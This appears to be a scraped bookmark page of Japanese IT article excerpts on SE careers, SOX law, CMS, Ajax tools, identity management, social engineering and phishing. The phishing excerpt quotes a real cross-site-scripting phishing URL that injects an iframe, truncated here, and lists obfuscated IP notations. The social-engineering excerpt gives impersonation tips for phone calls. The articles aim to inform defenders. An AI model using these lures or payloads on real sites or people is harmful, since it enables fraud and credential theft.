顧客満足度ナンバーワンSEの条件とは?
顧客満足度ナンバーワンSEの条件とは? 連載の最終回。成功するSEの姿はどんなものか、もう一度整理してみたい。(特集:顧客満足度ナンバーワンSEの条件)[6/30] 社長とITの話をするための12のコツ 目的と要件の整理でアーキテクチャは見える アプリケーション導入は自分の判断基準で すこしのことにも先達はあらまほしきことなり システム化を図るSEのスーパーテクニック データを制するSEがシステムを制す SEが木を見て森を見て本質を見抜くために SEが自分の「売り」を見極めるために プロとしてお金を稼げるSEの条件 一歩先を行くSEの頭の使い方 ここ一番の会議は「段取り力」で勝負 一歩先を行くSEの「頭の使い方」を考える。今回は会議における疑問や不満の原因を分析し、より効率的な話し合いをするための方法論を紹介していく。(特集:顧客満足度ナンバーワンSEの条件)[6/30] 発想力強化には「
日本版SOX法 ― @IT情報マネジメント用語事典
相次ぐ会計不祥事やコンプライアンス(注1)の欠如などを防止するため、米国のサーベンス・オクスリー法(SOX法)(注2)に倣って整備された日本の法規制のこと。上場企業およびその連結子会社に、会計監査制度の充実と企業の内部統制(注3)強化を求めている。 「日本版SOX法」という呼び名は俗称で、実際には証券取引法の抜本改正である「金融商品取引法」の一部規定がこれに該当する。同法では第24条の4の4で「有価証券報告書を提出しなければならない会社のうち、金融商品取引所に上場している有価証券の発行者である会社その他の政令で定めるものは、事業年度ごとに、当該会社の属する企業集団及び当該会社に係る財務計算に関する書類その他の情報の適正性を確保するために必要な体制について評価した報告書(内部統制報告書)を有価証券報告書と併せて内閣総理大臣に提出しなければならないこととする。また、内部統制報告書には、公認会計
サーベンス・オクスリー法
企業会計や財務報告の透明性・正確性を高めることを目的に、コーポレートガバナンスの在り方と監査制度を抜本的に改革するとともに、投資家に対する企業経営者の責任と義務・罰則を定めた米国連邦法。 エンロン事件やワールドコム事件など1990年代末から2000年代初頭にかけて頻発した不正会計問題に対処するため制定されたもので、2002年7月に大統領署名により法律として承認された。1933年の連邦証券法、1934年の証券取引所法制定以来、最も大きな変更といわれる。 正式には「Public Company Accounting Reform and Investor Protection Act of 2002:上場企業会計改革および投資家保護法」といい、法案を連名で提出したポール・サーベンス(Paul Sarbanes)上院議員、マイケル・G・オクスリー(Michael G.Oxley)下院議員の名にち
[CMS (content management system)] @IT情報マネジメント用語事典
テキストやグラフィックなどのさまざまなデジタル・コンテンツを収集、登録して統合的に管理し、更新・配信する仕組み、またはそれを実現するソフトウェアの総称。 広義には企業内のビジネス文書の管理を行うドキュメント管理ソフトやデジタルアセットマネジメント・システムなどを含めていうが、狭義にはインターネットないしはイントラネットに情報発信するためのWebサイトのコンテンツを効率的に管理するWebコンテンツ管理ソフトをいう。また全社レベルでコンテンツを統合管理するものは、ECMと呼ばれる。 WebサイトでWebページを作成・更新するとき、HTMLファイルを作成する方法だと、コンテンツ作成者は文章を書く以外にHTMLのコードに関する知識が必要で、デザインにも配慮しなければならない。文書作成とHTMLデザインを分業すれば、テキストのちょっとした修正・更新にもデザイナーやWebサイト管理者が関与しなければな
ITmedia エンタープライズ:Google、Ajaxアプリ開発ツールのβ版公開
Google Web ToolkitではJavaを使ってGoogle MapsやGmailのようなAjaxアプリケーションを開発し、GWTコンパイラでJavaScriptとHTMLに変換できる。 米Googleは、JavaでAjaxアプリケーションを作成するためのソフト開発ツール「Google Web Toolkit」(GWT)のβ版を公開した。 同ツールでは、Javaを使ってGoogle MapsやGmailのようなAjaxアプリケーションを開発できる。自分の好きなJava開発ツールを使ってAjaxアプリケーションの作成とデバッグを行い、GWTコンパイラでJavaアプリケーションをブラウザ対応のJavaScriptとHTMLに変換することが可能。 GWTで作成したアプリケーションはIE、Firefox、Mozilla、Safari、Operaの各ブラウザを自動的にサポートするという。GW
ベストプラクティス(べすとぷらくてぃす)
最も効果的、効率的な実践の方法。または最優良の事例のこと。 ビジネスや経営においては、世界で最も優れていると考えられる業務プロセス、業務推進の方法、ビジネスノウハウのことをいう。ERPパッケージが登場したころには、「ERPはベストプラクティスの集まりである」というような言い方がされた。 もともとは、経営管理手法としての「ベンチマーキング」における、自社をその状態に近づけるべき最高水準の状態として、比較・分析の対象となるモデルのことを「ベストプラクティス」という。
ITmedia エンタープライズ:進化する!データベーステクノロジー
企業システムの命綱ともいえる存在がデータベースだ。各データベースベンダーは2005年から2006年にかけて、さまざまな新機能を搭載した新バージョンをリリースしている。これらのフィーチャーテクノロジーをチェックし、各ベンダーの目指す方向を考えてみよう。 新着記事 身の丈に合ったデータベース選び データベース業界には、著名な製品のほかにもさまざまなRDBMSが存在する。これらは特定の用途に特化し、そのために必要な機能を備えたものや、アプリケーション組み込みに特化したものなど、それぞれに特徴がある。また、最近企業内システムへの導入例なども見られるようになったオープンソースのRDBMSについて、その動向を確認し、これから、これらのデータベースがどうなっていくのかを見てみよう。 (2006/6/19) データベースを自動メンテする!――オートノミック管理とは? リレーショナルデータベースの元祖となっ
OSSの次世代デスクトップ――0.62で洗練するProject Looking Glass 3D API
OSSの次世代デスクトップ――0.62で洗練するProject Looking Glass 3D API:プロジェクトリード川原英哉氏寄稿(1/2 ページ) 最新バージョン0.62では、多くのLinuxネイティブアプリをサポートした。さらに3Dの躍進を象徴するLG3D APIが制定され、アプリケーション開発が容易になった点が大きい。この特集は、プロジェクトリードでSunの川原氏自らの寄稿記事でお送りする。 米サン・マイクロシステムズが支援する、次世代3Dデスクトップ探求のオープンソースプロジェクト「Project Looking Glass」(以下、LG3D)は、最新バージョン0.62をリリースした。この特集では、大幅な強化が図られたバージョン0.62のポイントや、盛り上がりを見せているコミュニティーの活動を中心に、プロジェクトリード自らが紹介していく。 大学研究での開発プラットフォームと
ユーザーが作るUI「CGUI」が普及 NRIが見るWeb2.0時代
ユーザーが自ら作ったインタフェース「CGUI」が2009年度に普及する――野村総合研究所(NRI)はこのほど、2010年度までのWeb技術の進展を予測する「ITロードマップ」の最新版で、こんな見通しを示した。Ajax(Asynchronous JavaScript + XML)やFlashなど、豊かな表現力と高い操作性をクライアントに持たせられるリッチクライアント技術の普及がカギを握るという。 Web2.0のトレンドの特徴の1つとして、ユーザーが情報発信するCGM(Consumer Generated Media)を挙げ、ユーザーがAPIとリッチクライアント技術を活用して自らUIを作り、公開する「CGUI」が萌芽し始めていると指摘。「Yahoo! Widget」や「Google Sidebar」がその例だ。今後、APIを公開する企業が増えれば、CGUIが普及・一般化していくと見ている。 S
ITmedia エンタープライズ:Opera、Ajax採用のWebアプリ開発キットβ版公開
Ajaxを用いた携帯用Webアプリ開発キット「Opera Platform SDK」では、HTML、CSSなどをベースとしてプラットフォームにとらわれないアプリを構築できる。 ブラウザ開発企業のOpera Softwareは11月15日、携帯電話用Webアプリ開発・実行のためのソフト開発キット「Opera Platform SDK」のβ版を公開した。電子メールクライアント、ゲーム、株価ティッカーといったWebアプリ開発に利用できる。 Opera Platformでは、Google Mapsなどにも用いられているWebアプリ構築技法のAjaxを利用。HTML、CSS、JavaScriptなどをベースに、プラットフォームにとらわれないアプリケーションを構築できる。また、既存のコンテンツとWebアプリを携帯電話に対応させることも可能。 β版は同社サイトからダウンロードできる。詳しい情報はOper
カタログでは決して分からないID管理製品の選択基準
カタログでは決して分からないID管理製品の選択基準:今、見直されるアイデンティティ管理(3/3 ページ) ユーザー固有のビジネスロジックをIDMに反映させる 一方、Sun Java System Identity Managerのように「バーチャルアカウント」の概念を持つ製品もある。 氏名、部署、役職などのユーザー属性は、場合によっては100個を超えるケースも珍しくない。図3の「属性情報ストア方式」は、IDMコアにこれらの属性情報をすべて書き込んでから連携する方式である。これに対する図4のバーチャルアカウント方式では、IDMコアに対してIDの必要最低限の情報のストアと、「ADに連携する」といったインプットに対してのアウトプットの定義だけを行うことで、IDMコアに対するデータの書き込みが大幅に減少する。大規模のユーザー環境やターゲットシステムが多い環境において人事異動の処理時間が危惧される場
カタログでは決して分からないID管理製品の選択基準
カタログでは決して分からないID管理製品の選択基準:今、見直されるアイデンティティ管理(2/3 ページ) アクセス管理IDMとSSO、どちらを先に導入すべきか こうしたIDMと一緒に検討されるのがアクセス管理である。前回述べたように、アクセス管理はIDMとともにID統合管理基盤と位置付けられており、「認証」「認可」「SSO(シングルサインオン)」の機能がある。IDMが権限のグルーピングなど権限にひも付く条件付けであるとすると、アクセス管理は権限そのものであり、認証、認可を管理する役割となる。 筆者は、パスワードが増えたとの理由でユーザーから導入を前提にSSOの説明を求められた際、IDMとSSOのどちらを先に導入すべきかについてよく尋ねられる。これは、例えばWebシステムに対してIDM基盤のない環境でSSOを導入した場合を考えてみると分かりやすい。 一般的にWebシステムに対してSSOを導入
カタログでは決して分からないID管理製品の選択基準
管理対象システムのエージェントソフトの有無により、「エージェント型」または「エージェントレス型」としてIDM製品を分類している場合もあるようだが、実際には各製品で「APIベース」と「プロトコルベース」の両方のインタフェースを用意している場合が多く、IDM製品自体をエージェントの有無により分類することは難しい。例えば、一般的にエージェント型と分類されているノベルの「Novell Identity Manager」でも、ADなどと連携する場合には専用ソフトが必要となるが、標準的なLDAPドライバなどは用意されており、エージェントは不要となる。 また、専用ドライバが用意されていないレガシーアプリケーションなどでは、CSVファイルなどで連携をとる「ファイルベース」のプロビジョニングが一般的だ。このファイルベースタイプでは、IDM管理コアと管理対象システム間は疎結合となり、IDMコア側で管理対象サー
だます人の視点――「自分はだまされない」が通用する?
だます人の視点――「自分はだまされない」が通用する?:あなたを狙うソーシャルエンジニアリングの脅威(2/2 ページ) 「例えば、ネットワーク管理者を演じる場合、声色は高くもなく低くもなく、論理的かつ事務的な印象を与えるようにする。また、ネットワーク管理者は業務性質上、セキュリティ情報などを扱っているから、自分からはできるだけ新しい情報を話さず、社交的な雰囲気を出さないようにしたりする」 A氏の経験の中で特に効果的だったのは、上司へのなりすましだったという。「上司といっても、直属の上司ではすぐにばれる。大企業であれば、ほとんど話したことがないような代表取締役などの役員とか、公認会計士、弁護士、検査官といった、権威があって少し遠い存在がいい。しかし、情報はシステムに入っていることがほとんどなので、一番簡単なのはやはりネットワーク管理者。システム変更やセキュリティのためと言えば、こちらの指定した
ITmedia エンタープライズ:だます人の視点――「自分はだまされない」が通用する? (1/2)
だます人の視点――「自分はだまされない」が通用する?:あなたを狙うソーシャルエンジニアリングの脅威(1/2 ページ) 「自分はだまされない」。そう考えている人は多いだろう。ただ、人間の心理を突いたソーシャルエンジニアリングのテクニックに気付いていないだけかもしれない。 「振り込め詐欺」や「フィッシング詐欺」など新手の詐欺が世間を騒がしている昨今、自分は絶対に引っかからないと自信を持っている人は多いだろう。「むしろ、一度でいいから電話をかけてきてほしい。冷静かつ論理的に対応して、相手の居所を突き止め、警察に突き出してやる」――筆者はそう友人に話す1人だった。何百万もの大金をいとも簡単に振り込むなんて、よほどの慌て者かお人好しだろう。ちょっと考えれば矛盾に気付くはずだ。 これら詐欺などの裏で使われている手法に「ソーシャルエンジニアリング」と呼ばれる技術がある。話術や心理作戦でネットワーク管理者
敵を知る――最新のフィッシング詐欺の手口とは
この記事では、企業がフィッシング対策に取り組む前提として、実際にフィッシング詐欺に使われたメールやWebサイトの画像を用いて手口を説明していく。 フィッシング詐欺の存在が知られるようになって2年近くなるが、その手口はますます巧妙さを増している。ユーザーがうっかり個人情報を漏らすよう仕向けるため、偽物をいっそう「本物らしく」見せかけるだけでなく、フィッシング対策をすり抜けるためのテクニックも使われるようになってきた。 まず、改めてフィッシング詐欺について説明しておこう。たいていの場合は本物そっくりの偽メールを送りつけたり、あるいは偽サイトにおびき寄せてユーザーをだまし、アカウント情報やパスワード、クレジットカード番号といった個人情報を盗み取る。 当初、ユーザーをだますには、ただ画像を貼り付けただけのHTMLメールが利用されることが多かった。しかし「メール中のリンクをクリックしない」「アドレス
敵を知る――最新のフィッシング詐欺の手口とは
この手口では、フィッシングメール中のリンクをクリックすると最初にアクセスさせられるのは、ロゴとリンクだけを用意したシンプルなページだ。このページ中のリンクをクリックすると、個人情報を入力させるポップアップウィンドウが現れる(画面8)リンクだけを記した前のページは、Webブラウザによるポップアップウィンドウのブロック警告を回避するためにわざわざ用意されているのだ。 Webブラウザが備えるポップアップブロック機能では、ユーザーの意図に反して自動的に現れるウィンドウはブロックされる。しかし、ページ要素をクリックするなど、ユーザー自身が起こしたアクションにより開かれるポップアップウィンドウはブロックされないことになっている。 フィッシャーが詐欺サイトでポップアップウィンドウを利用する理由の1つは、アドレスバーやWebブラウザ下部のステータスバーを表示しないようにするためだ。標準のアドレスバーを非表
敵を知る――最新のフィッシング詐欺の手口とは
クロスサイトスクリプティングの脆弱性を悪用する 2005年5月に出回ったCharter One Bankを装ったフィッシングメールは、Webサイト側に存在するクロスサイトスクリプティングの脆弱性を悪用したものだった(関連記事)。 このケースで送られてきた「Account Error」と題されたメールには、以下のようなリンクが記されている。「www.charterone.com」は本物のCharter One Bankのサイトのアドレスだが、その後にエンコーディングされた文字列が付け加えられている。 http://www.charterone.com/cards/market.asp?code=%22%3E%3Ciframe+style%3D%22top%3A0%3B+left%3A0%3B+position%3Aabsolute%3B%22+FRAMEBORDER%3D%220%22+BO
敵を知る――最新のフィッシング詐欺の手口とは
さらに、フィルタリングを回避する目的と思われるが、フィッシングサイトのURLにロングIPアドレスや16進数表記を使うケースが増えてきている(*1)。 通常、IPアドレスの表記には、「68.98.206.34」といった具合に10進数をドットで区切る方法が用いられる。フィッシャーはそれを「415561878」や「0x18.0xe3.0x7d.0x36」「0x52c3e7e2」といった表記にすることで、対策をすり抜けようとしている。 というのも、ドメイン名ではなくIPアドレスを含むURL表記を用いているサイトは、フィッシングサイトである可能性が高い。そこで、スパムフィルタやフィッシング対策ツールバーの中には、メール中にIPアドレスを用いたリンクが含まれていたり、あるいはIPアドレス表記のWebサイトにアクセスしようすると、警告してくれるものがある。しかしこうした対策ツールの多くは、通常使用される
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
ITmedia Biz.ID:LifeHack(ライフハック)